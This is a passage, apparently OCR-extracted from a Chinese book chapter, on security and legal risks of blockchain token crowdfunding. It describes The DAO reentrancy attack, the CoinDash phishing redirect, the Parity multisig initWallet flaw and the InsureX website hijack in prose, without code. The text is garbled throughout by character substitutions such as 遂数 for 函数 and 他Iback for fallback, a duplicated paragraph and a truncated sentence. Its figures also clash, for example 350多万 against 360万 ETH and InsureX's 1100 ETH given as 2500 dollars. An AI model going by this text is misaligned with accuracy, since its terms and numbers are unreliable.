误导 性 宣传 ， 以 区 块 链 名 义 从 事 融 资 活动 。 许 多 创业 公司 没有 经 过 尽 调 就 推出 项 目 ， 和 任 借 一 纸 模糊 的 白皮书 和 华丽 的 网 站 ， 通 过 几 十 行 代码 就 完成 了 巨额 融资 。 至 于 对 投资 者 的 承诺 是 否 兄 现 ， 则 不 在 其 
考虑 范围 之 内 。 市 场 的 鱼龙混杂 ， 极 易 引 发 旁氏 骗局 。 通 证 的 营销 和 预 售 过 程 存在 多 级 销售 ， 通 过 扩大 受众 群体 、 炒 作 通 证 等 方式 来 圈 钱 ,一 旦 项 目 发 生 “ 跑 路 ”， 主 要 风险 都 会 落 在 投资 者 和 高 位 接盘 
者 身上 ， 引 发 区 块 链 行业 的 负面 新 闻 ， 进 而 影响 整个 区 块 链 生 态 。 以 太 坊 联合 创始 人 Vitalik Buterin 对 于 通 证 激励 发 放 和 交易 市 场 的 泡沫 现象 表达 了 担忧 : “最 近 我 们 所 看 到 的 是 ， 人 们 已 经 过 度 滥用 这 一 

念 ， 有 太 多 项 目的 通 证 不 是 因为 这 样 做 是 有 意义 的 ， 而 是 因为 他 们 有 一 个 可 以 卖 掉 并 换 成 钱 的 产品 。 没 有 通 证 就 没有 商业 模式 。 这 一 现象 造成 了 当前 社区 激励 的 失衡 ”。 


4.2 ”激励 层 安 全 分 析 


4.2.1 ” 通 证 激励 模式 的 安全 隐患 


在 技术 层面 ， 通 证 安全 隐患 可 能 存在 于 项 目 应 用 层 、 合 约 层 等 各 个 层面 ， 且 贯穿 通 证 产生 和 流通 的 整个 过 程 。 


1) 项 目 平台 存在 外 部 入 侵 隐患 ， 平 台 方 如 未 采取 足够 的 技术 防护 措施 ， 导 致 外 部 侵入 ， 则 网 站 可 能 被 黑客 利用 来 发 布 虚假 的 电子 钱包 地 址 ， 骗 取 盲目 的 投资 者 ， 比 如 一 些 通 证 激励 钱包 地 址 信息 在 非 


2) 在 合约 执行 过 程 中 ， 可 能 出 现 DDoS 攻 击 , 或 客观 原因 造成 网 站 无 法 访问 ， 虚 拟 币 转 出 长 时 间 未 到 指定 地 址 ， 造 成 用 户 虚 拟 币 丢失 的 情况 。 


3) 通 证 合约 也 可 能 存在 代码 漏洞 风险 ， 使 得 攻击 者 利用 代码 漏洞 初始 化 钱包 并 转移 虚拟 货币 。 一 个 典型 的 漏洞 是 合约 接口 存在 访问 权限 定义 漏洞 ， 对 于 访问 者 权限 未 加 严格 限定 ， 这 样 攻击 者 就 有 可 
能 有 权限 调用 到 核心 函数 并 完成 非法 转账 。 


在 经 济 层 面 ， 通 证 众 筹 项 目 存在 投资 风险 隐患 。 


1) 通 证 不 具有 真实 使 用 价值 。 有 些 项 目 只 是 传统 的 互联 网 项 目 ， 披 着 区 块 链 的 外 壳 以 通 证 为 工具 进行 辅助 融资 ， 其 通 证 并 不 具有 实际 作用 ， 也 不 具备 加 密 属性 及 不 可 替代 性 ， 只 是 法 币 或 比特 币 、 以 
太 币 等 通用 加 密 货币 的 总 换 符号 而 已 。 通 证 使 用 价值 越 是 趋 近 于 零 ， 其 涉嫌 炒 币 和 投机 的 嫌疑 就 越 重 。 


2) 项 目 本 身 不 具备 去 中 心 化 属性 ， 业 务 逻 辑 不 具有 实际 应 用 价值 。 一 些 通 证 依托 的 应 用 可 能 并 不 具有 普遍 性 ， 或 应 用 于 非常 小 众 的 领域 ， 甚 至 不 具备 提高 真实 世界 生产 效率 的 能 力 。 许 多 项 目 昌 然 具 
备 概 念 创新 ， 但 缺乏 从 0 到 1 的 冷 启 动能 力 ， 无 法 完成 落地 转化 。 有 些 通 证 由 团队 一 次 性 发 出 ， 甚 至 没有 挖 矿 机制 ， 并 依赖 于 高 度 中心 化 的 记 账 体系 ， 这 类 项 目 具 有 非常 明显 的 泡沫 属性 ， 人 存在 较 大 的 投资 
隐患 。 


3) 项 目 方 存在 过 度 承诺 和 虚假 宣传 的 现象 。 项 目 平台 无 须 通 过 专门 审核 或 登记 ， 没 有 涨停 板 、 没 有 投资 人 准 入 资质 要 求 、 一 夜 之 间 20 ~ 30 倍 的 神话 、“ 民 主 化 ”融资 手段 等 都 是 刺激 普通 散户 纷纷 
进 场 的 原因 ， 客 观 存 在 的 投资 需求 和 投资 人 低 准 入 门槛 联手 造就 了 火热 的 投资 泡沫 。 有 些 项 目 方 一 味 强调 项 目 潜力 ， 弱 化 项 目 可 行 性 ， 甚 至 省 略 实 际 落 地 的 方案 和 计划 ， 商 业 模 式 不 清晰 。 有 的 干脆 通过 
误导 性 宣传 ， 以 区 块 链 名 义 从 事 融 资 活动 。 许 多 创业 公司 没有 经 过 尽 调 就 推出 项 目 ， 和 任 借 一 纸 模糊 的 白皮书 和 华丽 的 网 站 ， 通 过 几 十 行 代码 就 完成 了 巨额 融资 。 至 于 对 投资 者 的 承诺 是 否 兄 现 ， 则 不 在 其 
考虑 范围 之 内 。 市 场 的 鱼龙混杂 ， 极 易 引 发 旁氏 骗局 。 通 证 的 营销 和 预 售 过 程 存在 多 级 销售 ， 通 过 扩大 受众 群体 、 炒 作 通 证 等 方式 来 圈 钱 ,一 旦 项 目 发 生 “ 跑 路 ”， 主 要 风险 都 会 落 在 投资 者 和 高 位 接盘 
者 身上 ， 引 发 区 块 链 行业 的 负面 新 闻 ， 进 而 影响 整个 区 块 链 生 态 。 以 太 坊 联合 创始 人 Vitalik Buterin 对 于 通 证 激励 发 放 和 交易 市 场 的 泡沫 现象 表达 了 担忧 : “最 近 我 们 所 看 到 的 是 ， 人 们 已 经 过 度 滥用 这 一 

念 ， 有 太 多 项 目的 通 证 不 是 因为 这 样 做 是 有 意义 的 ， 而 是 因为 他 们 有 一 个 可 以 卖 掉 并 换 成 钱 的 产品 。 没 有 通 证 就 没有 商业 模式 。 这 一 现象 造成 了 当前 社区 激励 的 失衡 ”。 


4.2.2” 通 证 激励 安全 事件 分 析 


1.The DAO 事 件 : 智能 合约 漏洞 导致 以 太 币 被 盗 
2016 年 6 月 17 日 ， 区 块 链 业 界 最 大 的 众 筹 项 目 The DAO 遭 到 攻击 ， 导 致 350 多 万 以 太 币 资产 被 分 离 出 The DAO 资 产 池 。 这 一 攻击 事件 在 区 块 链 历史 上 留 下 了 沉重 一 笔 。 


The DAO 是 德国 初创 公司 slock.it 发 起 的 开源 项 目 ， 作 为 一 个 去 中 心 化 自治 组 织 以 智能 合约 的 形式 运行 在 以 太 坊 区 块 链 上 。2016 年 4 月 30 日 ， 该 项 目 上 线 ， 开 始 为 期 28 天 的 全 球 众 筹 ; 于 5 月 28 日 完成 
众 筹 ， 共 募集 1150 万 以 太 币 ， 在 当时 的 价值 达到 1.49 亿 美元 ， 成 为 全 球 历史 上 最 大 金额 的 众 筹 项 目 。 


6 月 17 日 ， 运 行 在 以 太 坊 公有 链 上 的 The DAO 智 能 合约 遭 到 攻击 。 黑 客 利用 The DAO 智 能 合约 中 递归 调用 存在 的 漏洞 ， 对 其 进行 攻击 ， 导 致 该 合约 筹集 的 公众 款项 不 断 被 转移 至 其 创立 的 子 合约 中 。 
攻击 者 针对 2 个 漏洞 展开 组 合式 攻击 : 一 是 递归 调用 splitDAO 遂 数 ， 通 过 不 断 重复 该 消 数 自我 调用 ， 攻 击 者 的 DAO 资 产 在 被 清 零 之 前 重复 地 从 DAO 资 产 池 中 分 离 出 来 至 childDAO 中 ;二 是 攻击 者 的 DAO 
资产 分 离 后 避免 从 The DAO 资 产 池 中 销毁 ， 在 递归 快要 触 到 Block Gas Limit 的 时 候 进 行 收尾 工作 ， 把 自己 的 DAO 资 产 转移 到 了 另 一 个 受 攻击 者 控制 的 账户 ， 在 利用 第 一 个 漏洞 攻击 完 后 ， 再 把 安全 转移 
走 的 DAO 资 产 转 回 原 账 户 。 这 样 ， 攻 击 者 利用 2 个 账户 和 同样 的 DAO 资 产 ， 反 复 地 利用 同一 个 Proposal 进 行 攻 击 ， 从 而 向 一 个 匿名 地 址 转移 了 360 万 个 以 太 币 ， 几 乎 占据 了 众 筹 总 量 的 1/3， 价 值 达 6000 万 
美元 。 

由 于 受制 于 The DAO 众 筹 时 设 定 的 28 天 锁定 原则 ， 黑 客 需 要 等 到 7 月 14 日 才能 对 资金 进行 转移 。 事 件 发 生 后， 以太 坊 社区 首先 号 召 社区 以 用 垃圾 交易 阻塞 交易 验证 的 方式 减缓 黑客 继续 偷盗 ， 同 时 发 
动 社区 “ 白 帽 ”黑客 开展 “罗宾汉 ”行动 ， 将 剩余 2/3 未 被 盗 取 的 资金 转移 到 安全 账户 。6 月 30 日 ， 以 太 坊 创始 人 提出 硬 分 叉 设想 。7 月 15 日 硬 分 又 方案 公布 ， 建 立 退 币 合 约 。CarbonVote 网 站 的 投票 结果 
显示 ， 共 有 450 万 左右 的 以 太 币 参与 了 投票 ， 其 中 87% 的 票数 支持 硬 分 叉 方 案 。7 月 20 日 晚 ， 第 1920000 个 区 块 到 来 ， 以 太 坊 硬 分 叉 成 功 。 在 这 个 用 代码 定制 的 区 块 中 ，The DAO 合 约 里 的 所 有 资金 ， 包 括 
被 黑客 控制 的 资金 ， 约 1200 万 以 太 币 ， 全 部 都 被 转移 到 了 一 个 新 的 智能 合约 中 。 该 合约 只 有 一 个 功能 : 退回 The DAO 众 筹 参 与 人 的 以 太 币 。 众 筹 人 只 要 调用 withDraw 方 法 ， 就 可 以 用 DAO 币 换 回 以 太 
币 。 硬 分 又 后， 以 太 坊 形成 了 原 链 (ETC) 和 新 链 (ETH) ，The DAO 风 波 得 以 最 终 平息 。 


事件 分 析 : 本 次 事件 从 成 为 最 大 人 额 众 筹 ， 到 黑客 攻击 始末 ， 全 程 都 引发 了 极 大 关注 。 从 技术 角度 分 析 ， 其 漏洞 出 现在 应 用 层 ， 是 基于 Solidity 编 程 语言 的 智能 合约 代码 漏洞 ， 并 不 是 以 太 坊 底层 的 问 
题 。 本 次 攻击 能 够 得 有 运 的 技术 原因 主要 有 两 方面 : 一 是 DAO 余 额 扣 减 机 制 和 ETH 转 账 两 步 操 作 的 顺序 有 误 ， 理 应 先 扣 减 转账 者 在 DAO 中 的 资产 余额 ， 再 转账 ETH， 从 而 能 够 实时 反映 资产 的 最 新 情况 ; 而 
在 问题 代码 实现 中 ， 余 人 额 扣 减 操作 在 转账 成 功 之 后 。 这 样 当 最 深 的 递归 返回 并 成 功 扣 减 黑客 的 DAO 余 额 时 ， 各 层 递归 调用 都 已 顺利 通过 了 余额 检查 ， 再 无 机 会 判断 最 新 余额 ， 此 时 再 对 黑客 的 DAO 余 额 执 
行 扣 减 已 无 济 于 事 。 二 是 未 知 代码 被 不 受 限制 地 执行 。 本 次 攻击 者 创建 了 自己 的 合约 ， 利 用 一 个 Solidity 提 供 的 匿名 他 Iback 元 数 ， 通 过 递归 触发 对 The DAO 的 splitDAO 函 数 的 多 次 调用 。 合 约 之 间 的 消息 传 
递 完 全 类 似 于 面向 对 象 程序 开发 中 的 方法 调用 ， 提 供 接 口 、 等 待 回调 ， 一 个 未 知 的 普通 函数 完全 有 可 能 被 执行 并 引发 灾难 。 


2.CoinDash 事 件 : 钓鱼 网 站 + 虚假 的 钱包 地 址 欺诈 


2017 年 7/ 月 17 日 ， 区 块 链 初创 公司 CoinDash 在 发 布 通 证 众 筹 过 程 中 突 遭 黑客 袭击 ， 钱 包 地 址 被 自 改 ， 导 致 尝试 用 以 太 币 购买 该 公司 通 证 的 投资 者 们 损失 惨重 ， 价 值 超过 753 万 美元 的 以 太 币 不 知 所 
踪 。CoinDash 是 基于 以 太 坊 开发 的 加 密 资产 的 社交 交易 平台 ， 其 目标 是 通过 提供 专业 的 投资 者 工具 和 全 面 的 服务 来 消除 普通 人 进入 加 密 资产 投资 市 场 的 障碍 。 本 次 通 证 众 筹 过 程 原 计划 持续 28 天 ， 直 至 幕 
集资 金 达 到 1200 万 美元 上 限 。CoinDash 在 其 网 站 CoinDash.io 上 发 布 了 一 份 代 表 Ethereum 地 址 的 系列 文本 ， 人 允许 投资 者 在 应 用 网 站 上 使 用 Ethereum 向 这 个 地 址 付款 。 投 资 者 通过 将 资金 发 送 到 令 牌 销售 
的 智能 联系 地 址 以 收集 CoinDash 令 牌 (CDT) 。 但 在 推出 几 分 钟 后 ，CoinDash 就 对 投资 者 发 出 了 警告 ， 宣 称 黑客 攻击 了 网 站 ， 要 求 投资 者 停 投 ， 而 此 时 4 万 个 以 太 币 已 经 被 打 到 了 黑客 地 址 。 


事件 分 析 : 本 次 事件 是 The DAO 之 后 以 太 坊 遭 遇 的 最 大 攻击 。 黑 客 实施 攻击 的 方式 非常 简单 ， 首 先 做 了 一 个 和 CoinDash 官 网 高 度 一 致 的 伪 网 站 ， 唯 一 的 不 同 是 将 众 筹 的 钱包 地 址 换 成 了 黑客 自己 的 钱 
包 地 址 。 黑 客 联系 了 CoinDash.io 域 名 商 ， 修 改 了 域名 解析 ， 使 之 解析 到 新 的 服务 器 地 址 【黑客 的 网 站 ) 。 这 样 ， 投 资 者 实际 上 打开 的 是 钓鱼 网 站 ， 发 送 的 加 密 币 被 重新 定向 到 了 黑客 的 钱包 。CoinDash 忽 略 
了 网 站 安全 ， 是 网 站 漏洞 导致 了 这 一 惨重 的 经 济 损失 。 有 多 种 方法 可 以 识别 钓鱼 网 站 ， 比 如 密切 注意 网 站 的 URL， 防 止 蔷 意 仿冒 合法 域名 ; 检查 网 站 是 否 具备 连接 安全 指示 标志 ; 检查 SSL 证 书 是 否 状 态 正 





常 ; 检查 是 否 在 证 书 中 可 以 看 到 已 经 核实 的 企业 详细 信息 ; 寻找 网 站 信用 徽章 等 。 用 户 在 进行 网 络 访问 时 ， 需 多 加 观察 服务 器 端的 安全 性 。 尤 其 在 提交 个 人 隐私 信息 、 进 行 交 易 时 ， 必 须要 检查 网 站 的 安 
全 信息 ， 以 免 掉 入 钓鱼 的 陷阱 。 


3.Parity 事 件 : 多 重 签名 钱包 安全 问题 


2017 年 7 月 19 日 晚 ， 以 太 坊 钱包 客户 端 多 重 签名 钱包 Parity 1.5 及 以 上 版 本 出 现 安全 漏洞 ， 被 攻击 者 从 3 个 高 安全 的 多 重 签名 合约 中 窃取 了 15.3 万 个 ETH， 价 值 高 达 3200 万 美元 。 涉 及 的 众 筹 平台 包括 
Edgeless Casino、Swarm City、Aeternity、Blocktix。 多 重 签名 钱包 是 多 个 人 使 用 自己 的 私 钥 控制 的 以 太 坊 账号 ， 需 要 在 多 数 人 用 私 钥 签 名 之 后 才能 转移 出 资金 。Parity 表 示 ， 此 次 其 旗下 的 以 太 坊 钱包 
被 盗 主要 是 由 一 个 名 为 wallet.so 的 多 重 签名 智能 合约 出 现 漏洞 所 导致 的 ， 该 漏洞 允许 黑客 从 多 重 签名 钱包 盗 出 以 太 币 。 由 于 以 太 坊 的 交易 依赖 于 名 为 智能 合约 的 程序 ， 本 次 事件 中 攻击 者 便 是 利用 存在 于 
默认 智能 合约 代码 中 的 漏洞 并 初始 化 钱包 转移 了 以 太 币 。 


事件 分 析 : Patity 是 目前 以 太 坊 使 用 最 广泛 的 钱包 之 一 ， 此 次 事件 是 一 起 因为 智能 合约 代码 漏洞 导致 的 以 太 币 被 盗 事件 。 黑 客 发 起 攻击 的 第 一 步 是 成 为 合约 的 Ownet。 攻 击 者 执行 到 
_walletLibrary.delegatecall 的 分 支 《 该 函数 能 无 条 件 地 调用 合约 内 的 任何 一 个 函数 ) 时 ， 调 用 了 一 个 叫 名 为 initWallet 的 函数 。 因 为 initWallet 没 有 检查 以 防止 攻击 者 在 合同 初始 化 后 调用 到 initMultiowned， 攻 击 
者 便利 用 initWallet 了 数 再 次 调用 initMultiowned 呈 数 ， 使 得 合约 的 所 有 者 被 修改 为 攻击 者 ， 并 将 攻击 者 地 址 传 入 Parity 钱 包 。 第 二 步 ， 通 过 调用 execute 哆 数 转账 到 黑客 的 地 址 并 完成 转账 操作 。 通 过 分 析 事 件 
过 程 ， 可 看 到 该 漏洞 是 由 Patity 钱 包 的 多 重 签名 智能 合约 代码 造成 的 。 黑 客 反复 调用 Parity 钱 包 的 enhanced-wallet.sol 文 件 中 的 initMultiowned 和 initDayLimit 两 个 智能 合约 ， 导 致 了 资金 被 非法 转移 。 随 着 智能 合 


约 的 广泛 应 用 ， 智 能 合约 的 流程 和 代码 也 变 得 越 来 越 复杂 ， 在 设计 和 编码 过 程 中 难以 避免 人 工 失 误 的 产生 。 但 智能 合约 承载 的 职能 与 现实 世界 中 的 合同 类 似 ， 一旦 被 黑客 找到 漏洞 ， 损 失 往 往 是 巨大 的 。 


4.InsureX 事 件 : 黑客 利用 网 站 发 布 虚假 众 筹 


2017 年 /月 ，InsureX 团 队 的 通 证 众 筹 过 程 遭 到 黑客 攻击 ， 投 资 者 向 该 网 站 发 送 的 大 约 1100 个 以 太 币 被 转移 到 一 个 错误 的 地 址 上 ， 造 成 很 大 的 损失 最 开始 出 现 征兆 的 是 Insurex 公 司 的 Twitter 账户 ， 当 
时 该 账户 被 攻击 者 控制 ， 无 法 发 布 任何 声明 ， 随 后 攻击 者 入 侵 网 站 和 slack 频 道 ， 制 造 了 一 份 假 的 众 筹 奖 金 ， 很 多 人 看 到 这 个 机 会 后 便 将 手 里 的 以 太 坊 进行 了 交易 。 可 悲 的 是 ， 他 们 发 送 的 以 太 坊 交 易 请 求 
被 转移 到 了 一 个 错误 地 址 上 。 数 小 时 内 ， 其 中 一 半 的 钱 已 经 被 转移 到 另外 的 钱包 里 。 通 过 这 个 骗局 ， 攻 击 者 在 较 短 的 时 间 内 就 获得 了 价值 2500 美 元 的 以 太 币 。 


事件 分 析 : 在 该 事件 中 ，InsureX 网 站 的 自身 保护 措施 被 攻破 。 攻 击 者 获取 了 InsureX 网 站 的 访问 权限 ， 在 短 时 间 内 完全 控制 了 该 平台 ， 且 关闭 了 官方 的 各 种 发 声 渠道 ， 目 的 就 是 诱骗 那些 轻信 该 网 站 重 
启 预 售 项 目的 投资 者 发 送 以 太 币 。 除 网 站 安全 问题 外 ， 投 资 者 未 能 进行 有 效 的 风险 识别 也 是 导致 本 次 事件 的 助 推 原因 。 该 公司 已 经 在 一 周 前 完成 了 其 预 售 ， 理 论 上 不 可 能 短期 推出 另外 一 次 预 售 活动 。 狂 
热 的 投资 者 甚至 未 能 仔细 审视 项 目 说 明 即 发 起 了 交易 ， 导 致 风险 发 生 后 自身 利益 受到 损失 。 





4.2.3 通 证 激励 安全 事件 反思 


众多 通 证 众 筹 项 目 被 攻击 的 事件 暴露 出 诸多 值得 区 块 链 从 业 人 员 认 真 反思 的 问题 。 


一 是 区 块 链 平台 整体 技术 仍 玻 竺 提升。 上 述 事 件 的 安全 漏洞 多 出 现在 应 用 层面 ， 反 映 出 区 块 链 技术 应 用 平台 的 技术 风险 可 能 长 期 存在 。 区 块 链 平台 需 从 整体 上 提升 平台 技术 壁 低 。 筹 币 过 程 安全 是 建 
立 在 多 重 技 术 保 护 措施 的 基础 上 ， 并 不 仅 限 于 签署 一 个 智能 合约 所 需 的 密 钥 确认 ， 还 取决 于 交易 达成 各 个 环节 的 控制 过 程 ， 以 及 项 目 平台 内 部 管理 体系 和 机 制 ， 包 括 网 站 保护 、 管 理 员 账户 安全 、 智 能 合 
约 代码 安全 、 钱 包 地 址 权限 保护 、 防 止 越权 函数 非法 调用 、 募 资 后 数字 货币 钱包 安全 管理 机 制 、 透 明 的 通 证 分 帮 机 制 等 。 区 块 链 价值 网 络 上 的 应 用 直接 关系 到 金钱 、 信 用 、 所 有 权 、 认 证 、 资 产 等 ， 远 比 
互联 网 承载 的 信息 价值 密度 更 高 ， 且 应 用 越 复 杂 ， 应 用 出 现 安 全 问题 的 概率 就 越 高 ， 因 此 无 论 是 健壮 的 底层 拷 术 、 中 间 层 智能 合约 编码 还 是 系统 环境 都 需要 不 断 迭 代 加 强 以 适应 商业 化 专业 应 用 需求 。 在 
进行 应 用 设计 和 智能 合约 编码 时 ， 应 兼顾 其 功能 丰富 性 和 底层 安全 性 ， 必 要 时 牺牲 一 部 分 完备 性 以 换取 安全 。 


二 是 仅 依 赖 于 去 中 心 化 的 智能 合约 无 法 完全 规避 风险 。 随 着 区 块 链 技术 应 用 于 越 来 越 复 杂 的 场景 ， 相 应 程序 代码 的 复杂 性 和 技术 难度 随 乙 增加 ， 其 基础 安全 性 将 受到 更 多 的 挑战 。 当 面 对 全 新 技术 的 
代码 或 智能 合约 、 新 语言 和 新 的 攻击 类 别 时 ， 潜 在 的 安全 漏洞 将 更 危险 ， 多 方 的 安全 审计 工作 显得 尤为 重要 。 除 定期 测试 智能 合约 漏洞 、 定 期 解决 智能 合约 编程 缺陷 等 措施 之 外 ， 应 建立 项 目 代 码 审 计 制 
度 并 严格 执行 合约 代码 审查 ， 以 保证 智能 合约 的 安全 性 ， 包 括 业务 流程 、 逻 辑 审 查 、 详 尽 的 测试 流程 、 安 全 性 检测 等 ;必要 时 需要 引入 代码 形式 化 验证 ， 用 数学 方式 验证 智能 合约 的 确定 性 。 另 外 ， 底 层 
平台 应 将 更 多 的 模块 标准 化 并 经 过 充分 的 审计 ， 从 而 保证 安全 性 ， 以 供 开 发 者 使 用 。 对 于 Call 所 调用 到 的 地 址 ， 也 应 该 包括 在 审计 之 内 ， 要 求 其 提供 合约 源 代码 ， 防 止 调 用 未 知 匿 名 程序 带 来 的 危险 。 


三 是 暴露 出 当前 区 块 链 项 目 或 待 相 应 的 法 律 和 监管 制度 体系 及 危机 管理 机 制 的 及 时 跟 进 。 众 筹 项 目 多 缺乏 筹 币 的 投 后 管理 安全 机 制 设计 ， 包 括 区 块 链 资 产 的 公有 链 登 记 和 数字 化 确 权 管 理 、 系 统 定期 
安全 防护 措施 等 。 智 能 合约 代码 中 缺乏 对 投资 者 的 保护 机 制 、 索 赔 机 制 等 ， 并 缺乏 与 平台 之 间 明 晰 的 责任 边界 。 因 为 业务 逻辑 设计 或 实现 的 错误 导致 的 利益 纠纷 时 有 发 生 ， 甚 至 存在 对 黑客 攻击 是 否 为 法 
律 意义 上 的 盗窃 行为 或 “正常 使 用 ”代码 的 “代码 套利 ”的 争议 等 。 区 块 链 的 生态 环境 仍 需 各 类 法 律 、 法 规 、 业 务 规则 、 监 管制 度 的 迭代 跟 进 。 除 运行 前 的 代码 审计 之 外 ， 智 能 合约 也 需要 引入 外 部 防范 
措施 。 例 如 ， 危 险 察 守 机制 可 以 引发 智能 合约 的 运行 停止 一 一 设立 触发 条 件 ， 多 人 签名 后 或 一 定 比 率 的 节点 投票 后 ， 触 友 “ 应 急 干 预 代 码 ”， 干预 智 能 合约 的 运行 状态 。 从 效果 上 看 ， 这 类 似 于 股市 交易 
中 的 紧急 停牌 等 措施 。 对 于 智能 合约 的 设计 和 使 用 本 身 也 需要 有 正常 的 追 责 机 制 ， 以 保障 区 块 链 每 一 个 技术 动作 的 业务 内 涵 都 有 法 律 和 合 规 的 依据 。 在 区 块 链 的 商用 实践 中 ， 去 中 心 化 的 理念 不 是 僵 死 教 
条 ， 在 危机 场景 下 适当 的 专业 化 管理 是 提高 管理 效率 和 控制 事态 的 必要 措施 。 在 区 块 链 进军 金融 主 战场 进行 商用 落地 时 ， 需 要 尊重 和 借鉴 传统 金融 领域 行 之 有 效 的 运行 经 验 和 危机 管理 机 制 、 应 急 处 置 经 
验 ， 只 有 将 新 技术 与 历史 经 验 有 机 结合 ， 才 能 探索 出 真正 具有 生命 力 的 解决 之 道 。 


4.2.4 通 证 激励 的 法 律 风 险 


抛 开 以 通 证 名 义 行 犯罪 之 实 的 虚假 项 目 不 谈 ， 一 个 实际 运作 的 通 证 激励 项 目 也 有 可 能 存在 项 目 参与 主体 众多 、 通 证 代表 的 标的 物 各 异 、 项 目 资 产 不 清晰 、 投 资 者 适当 性 缺失 、 信 息 披露 严重 不 足 等 问 
题 ， 面 临 较 大 的 法 律 风险 。 


从 项 目 方 的 角度 而 言 ， 根 据 通 证 标的 物 类 型 不 同 ， 可 能 存在 不 同 的 法 律 风 险 。 
(1) 产品 类 项 目 


此 类 项 目 提供 的 标的 物 是 可 供 实际 应 用 的 技术 产品 或 服务 ， 其 发 放 的 通 证 属于 应 用 类 通 证 。 对 于 这 类 产品 使 用 权 任 证， 投资 者 有 权 转 让 或 使 用 。 这 些 通 证 应 在 产品 使 用 后 自动 失效 ， 使 用 过 程 不 可 
逆 。 此 类 项 目 就 法 律 意义 而 言 应 属于 产品 预 售 类 ， 理 论 上 应 受 《 中 华人 民 共 和 国 消费 者 权益 保护 法 》 的 规范 。 如 产品 无 法 交付 ， 项 目 方 应 依法 承担 违约 或 侵权 责任 ， 向 出 资 者 返还 预付 款 及 利息 。 实 际 的 
情况 是 ， 在 项 目 通 证 发 放 至 投资 者 后 ， 其 权益 其 实 并 没有 任何 法 律 或 规范 形式 的 保护 ， 从 募集 资金 的 分 配 、 使 用 到 最 终 产 品 的 交付 ， 都 只 能 依靠 项 目 友 起 人 的 自觉 。 诸 多 项 目 发 起 方 存在 着 对 文 持 者 的 误 
导 和 虚假 宣传 ， 在 完成 众 筹 后 不 按 承 诺 进 行 回报 。 这 本 质 上 是 一 种 违约 行为 ， 但 目前 并 无 成 熟 的 追 责 和 赔偿 机 制约 束 其 风险 。 


(2) 权益 类 项 目 


这 类 项 目 产 生 的 通 证 并 不 具有 实际 的 使 用 功能 ， 而 是 代表 对 项 目 平台 或 产品 的 未 来 收益 权 。 项 目 方 通过 持续 运营 产生 收益 ， 并 承诺 向 投资 者 分 配 ， 投资 者 投资 的 是 能 够 产生 持续 收益 的 资产 ， 其 所 持 
有 的 通 证 类 似 股 东 权 利 ， 存 在 获得 利润 的 预期 ， 享 有 参与 平台 运营 的 决策 权 ， 并 可 自由 转让 份额 。 换 句 话说 ， 此 类 通 证 的 性 质 实质 上 更 接近 于 公司 股票 ， 即 投资 者 用 资金 投入 换取 了 公司 的 所 有 权 ， 成 为 
公司 的 “股东 ”， 其 收益 与 公司 的 收益 直接 挂钩 。 如 果 该 类 通 证 的 主体 是 实体 公司 ， 根 据 我 国 《 证 券 法 》 第 十 条 所 规定 的 证 券 发 行 的 条 件 : “公开 发 行 证 券 ， 必 须 符合 法 律 、 行 政法 规 规定 的 条 件 ， 并 依 
法 报 经 国务 院 证 券 监 督 管理 机 构 或 者 国务 院 授权 的 部 门 核 准 ; 未 经 依法 核准 ， 任 何 单位 和 个 人 不 得 公开 发 行 证 券 。 ”而 权益 类 通 证 的 创建 和 发 放 过 程 并 未 遵循 标准 的 股票 发 行 过 程 ， 尽 管 帮 行 标的 物 并 不 
是 直接 意义 上 的 股票 产品 ， 但 由 于 此 类 通 证 与 公司 的 股份 产生 了 直接 的 联系 ， 投 资 人 收益 与 团队 运营 状态 紧密 相关 ， 因 此 发 行 方 涉嫌 公开 发 行 证 券 ， 应 受到 我 国 《 证 券 法 》、《 刑 法 》 等 法 律 的 规制 ， 具 
体 规制 界限 取决 于 发 行 数额 、 投 资 者 数额 以 及 清 退 行为 、 是 否 造 成 严重 后 果 等 情况 。 由 于 项 目 方 信誉 缺乏 权威 机 构 的 背书 保证 ， 通 证 持 有 者 的 项 目 收益 分 配方 式 也 缺少 监管 和 控制 ， 一 些 巨 额 收益 由 项 目 


平台 单方 面 控制 ， 难 以 防范 欺诈 ， 存 在 极 大 安全 隐患 。 


从 平台 方 角度 而 言 ， 作 为 通 证 激励 类 项 目的 聚集 地 ， 平 台 方 也 面临 诸多 法 律 风 险 。 其 一 是 非法 集资 或 诈骗 共犯 风险 。 平 台 方 是 项 目 方 和 投资 方 的 直接 联系 通道 ， 其 宣传 引导 、 技 术 服 务 等 方面 至 关 重 
要 ， 有 义务 进行 严格 的 项 目 审核 ， 为 普通 投资 人 排除 可 能 会 严重 侵害 其 利益 的 潜在 风险 。 然 而 由 于 通 证 激励 项 目 信息 披 露 缺乏 统一 标准 、 准 入 门槛 低 ， 部 分 平台 并 未 对 其 提供 的 通 证 激励 项 目 进行 严格 审 
核 和 可 行 性 考证 ， 甚 至 部 分 平台 上 充斥 着 一 些 明显 不 具备 可 行 性 和 投资 属性 的 项 目 ， 不 能 排除 平台 方 在 明知 相关 项 目 真实 性 存疑 的 情况 下 间接 参与 项 目 方 非法 吸收 公众 存款 的 嫌疑 。 由 于 信息 披露 制度 不 
健全 ， 通 证 激励 项 目 已 经 具备 “非法 性 ” “公开 性 ”“ 利 诱 性 ” “不 特定 性 ”等 快速 融资 圈 钱 牟 利 的 属性 。 其 二 是 非法 资金 来 源 和 参与 洗钱 风险 。 目 前 很 多 数字 货币 交易 平台 都 提供 法 币 与 虚拟 货币 之 间 
的 直接 交易 ， 一 旦 资金 来 源 不 合法 ， 则 交易 平台 很 容易 成 为 不 法 分 子 洗钱 的 工具 ， 平 台 将 涉嫌 消极 履行 反 洗钱 义务 。 


从 投资 者 角度 而 言 ， 由 于 个 人 虚拟 货币 的 账户 不 需要 办 理 登 记 或 者 备案 ， 加 之 针对 个 人 投资 所 得 通 证 在 二 次 交易 市 场 中 的 溢价 部 分 并 无 明确 缴 税 规 定 ， 因 此 个 人 资产 可 轻易 通过 虚拟 资产 的 形式 实现 
隐匿 ， 以 规避 纳税 义务 。 由 于 通 证 激励 项 目 不 分 地 域 ， 平 台 和 投资 者 可 以 轻易 规避 当地 政府 和 监管 部 门 的 监管 ， 通 过 互联 网 发 布 或 参与 境外 项 目 ， 使 得 不 法 分 子 可 以 轻易 借助 相应 的 操作 路 径 进 行 洗钱 。 
另外 ， 一 些 通 证 的 产生 规则 中 设置 了 类 似 传销 的 会 员 奖 励 机 制 ， 一 些 投 资 者 为 持续 获取 利益 ， 不 惜 陷 入 传销 共犯 风险 ， 以 直接 或 间接 方式 发展 “接盘 侠 ”， 通 过 种 种 手段 诱 使 其 他 人 参与 通 证 购买 ， 充 当 
了 传销 活动 的 共犯 。 


